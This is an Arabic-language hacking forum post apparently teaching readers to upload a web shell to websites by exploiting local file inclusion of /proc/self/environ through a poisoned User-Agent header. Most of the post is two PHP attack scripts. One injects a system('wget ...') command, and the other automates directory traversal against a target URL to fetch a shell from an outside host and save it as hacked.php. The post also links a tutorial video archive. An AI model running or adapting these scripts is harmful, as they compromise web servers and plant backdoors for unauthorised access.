عندك اكثر من طريقه للرفع كله يوصل لنفس الناتج
اهم شيء انك تقرا ملف
كود PHP:
proc/self/environ
لو عرفت تقراه معناه غصب راح نرفع لك شيل منها !!
شوف هون
كود:
http://sc0rpion.ir/tutorial-clips/Getting-shell-by-lfi-via-user-agent.rar
PHP script :
كود PHP:
<?php
ini_set('user_agent' , "<?php system('wget [shell] -O user.php'); ?> ");
$result = file_get_contents('http://[site]/../../proc/self/environ');
?>
هاد كود php بتعدل عليه الي بلزم ومعاه شرح يرفع لك شل بنفس الاسلوب لكن بدون الفايرفوكس !!
كمان كود اخر يقوم بنفس العمليه بس يختلف قليلا (رغم اني اشوفه فاشل بدون تجربه
كود PHP:
<?php
//Get Shell Via LFI(Local File Inclusion)
//Copyright BlackDream 2009
//mr.pr0n you are the best boy
//edit this if you want. Linux Command
$cmd = "<?php system(\"wget http://h1.Spam.com/s0ra/s0ra.txt; mv shell.txt hacked.php\");?>";
$site = "http://www.evilsite.com/index.php?page="; //enter it like http://www.thesite.com/index.php?page=
$proc_path = "proc/self/environ"; //without first slash
//Do not edit below this line
preg_match( "@^(http://.*?)(/|$)@", $site, $matches );
$path = "";
$i = 0;
while ( 1 )
{
if ( $i >= 20 )
break;
$path .= "../";
$source = page_get_*******( $site . $path . $proc_path );
if ( strstr($source, '********_ROOT') != false )
{
exit( "\nShell Uploaded With Success -> " . $matches[1] . '/' . "hacked.php" );
} else
echo "\nFail at state " . $i . "\n";
$i++;
}
function page_get_*******( $url )
{
global $cmd;
$ch = curl_init( $url );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_HEADER, 0 );
curl_setopt( $ch, CURLOPT_USERAGENT, $cmd );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, 2 );
curl_setopt( $ch, CURLOPT_TIMEOUT, 4 );
$ret = curl_exec( $ch );
curl_close( $ch );
return $ret;
}
?>
وهاد شرح روعه لسا ولا عربي شرحه
ركز فيه كويس هو استخدم اسلوب سهل كثير